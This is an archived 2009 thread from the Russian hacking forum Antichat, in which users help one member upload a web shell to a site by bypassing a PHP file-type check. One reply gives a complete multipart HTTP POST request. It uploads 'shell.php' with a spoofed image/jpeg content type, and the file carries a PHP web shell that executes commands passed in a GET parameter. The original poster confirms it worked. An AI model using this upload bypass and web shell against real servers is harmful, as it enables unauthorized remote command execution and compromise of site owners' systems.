Форум АНТИЧАТ - Помогите залить шелл

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Помогите залить шелл (https://forum.antichat.xyz/showthread.php?t=166745)

vld2008

28.12.2009 20:51

Помогите залить шелл (обойти $File_type)

не актуально

Tigger

28.12.2009 21:11

Эм... Послать POST-запрос, но в передаваемых данных указать image/gif.

vld2008

29.12.2009 12:28

можешь небольшой пример привести?

m0Hze

29.12.2009 12:56

Цитата:

Сообщение от vld2008

можешь небольшой пример привести?

То что ты дал - это не рабочий скрипт.Если быть точнее,он рабочий,если он куда то инклудиться,где и обозначаються фигурируемые там переменные.Если же нет,то если на сервере register_globals = on, то просто задай переменным нужное значение,и золей шелл таким образом.Но мне чтото подсказывает,что это только часть кода.

vld2008

29.12.2009 13:12

Хоть это и часть кода, он прекрасно заливает файлы (register_globals - ON, включены).
Если добавить

Цитата:

?d=/ПОЛНЫЙ ПУТЬ К ДИРЕКТОРИИ ДЛЯ ЗАЛИВКИ ФАЙЛА

в запросе к нему. Но вот именно обойти тип файла для заливки не могу. Попробуйте у себя его запустить

krypt3r

29.12.2009 13:19

Цитата:

можешь небольшой пример привести?

Если расширение не проверяется, то можно заюзать что-нибудь типа такого запроса

Код:

POST http://127.0.0.1/upload/ HTTP/1.1

Host: localhost

Referer: http://127.0.0.1/index.php

Cookie: PHPSESSID=$session_id

Content-Length: 1024

Content-Type: multipart/form-data; boundary="6G+f"



--6G+f

Content-Disposition: form-data; name="MAX_FILE_SIZE"



100000

--6G+f

Content-Disposition: form-data; name="uploaded"; filename="shell.php"

Content-Type: image/jpeg



<?php

  if (isset ($_GET['id']) && !empty ($_GET['id']))

    passthru ($_GET['id']);

  else

    echo "Empty";

?>

--6G+f

Content-Disposition: form-data; name="Upload"



Upload

--6G+f--

vld2008

29.12.2009 14:33

Йухуу, есть такое дело :)
Спасибо, krypt3r

Время: 11:20